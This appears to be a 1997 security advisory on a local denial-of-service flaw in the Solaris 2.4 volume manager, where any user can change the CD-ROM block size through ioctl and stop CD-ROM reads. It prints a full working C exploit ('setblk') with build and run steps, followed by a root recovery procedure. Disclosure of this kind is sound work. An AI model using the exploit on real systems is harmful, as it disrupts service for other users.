COMMAND

    Volume Manager & CD-ROM

SYSTEMS AFFECTED

    Solaris 2.4

PROBLEM

    Serge E. Pick  found following.   He tried to  read Video &  Audio
    data from  CD-ROM on  SS20 under  Solaris 2.4  and has detected an
    interesting feature.   He read data  from device, managed  by vold
    (volume     manager),     i.e.     /vol/dev/aliases/cdrom0     (or
    /vol/dev/rdsk/c0tX/<cd-name>).   Any user  can access  this device
    and change parameters of this one through ioctl() call.

    If you are not careful, you can corrupt CD-ROM management service.
    When you work with normal filesystem on CD-ROM, block size of this
    device is 512  bytes. But to  work with Audio  or Video CD,  it is
    necessary to change block size to 2336 or 2352 bytes.

    This message contain an simple programm to change block size on
    CD-ROM device.  To make service down, make:

        gcc -o setblk setblk.c
        ./setblk 2336
        eject

    Eject can be runned by any user too. After that try to put  CD-ROM
    in again. You will see on console:

        incomplete reading -- retrying.

    After some retryings it will be the message:

        incomplete reading -- giving up.

    And CD-rom will be ejected.

    Without eject,  it will  be unable  to read  any data  from files,
    replaced on CD-ROM,  if block mode  is not equal  to 512. So,  any
    user can prevent a normal work of system!  Exploit follows:

    ------------------------- program is here ------------------------
    /*
       Serge E. Pick (QuickPick), 19.08.1997
       Setblk set block size on CD-ROM device
       on Sparc Station/Server under Solaris 2.4/2.5
       Usage: setblk [<blksize>]
       Default: 512 bytes
    */
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/uio.h>
    #include <sys/stat.h>
    #include <sys/cdio.h>
    #include <fcntl.h>
    #include <unistd.h>

    main( int argc, char **argv )
    {
        int scd,st,size;

        scd = open("/vol/dev/aliases/cdrom0",O_RDONLY);
        if( scd==-1 ) perror("Cannto open cdrom device");

        if( argc<2 ) size = 512;
        else sscanf(argv[1],"%d",&size);

        /* main part */
        st = ioctl(scd,CDROMSBLKMODE,size);
        if( st==-1 ) perror("Unable to change blk size");
        else printf("Blk size changed to %d\n",size);

        exit(0);
    }
    ------------------------- end of programm ------------------------

SOLUTION

    To restore service, you have to do (as root):

        1. /etc/rc2.d/S92volmgt stop
        2. Put CD-ROM in drive (it is not necessary to be a root ;-)
        3. /etc/rc2.d/S92volmgt start

    After that block size will be restored to 512.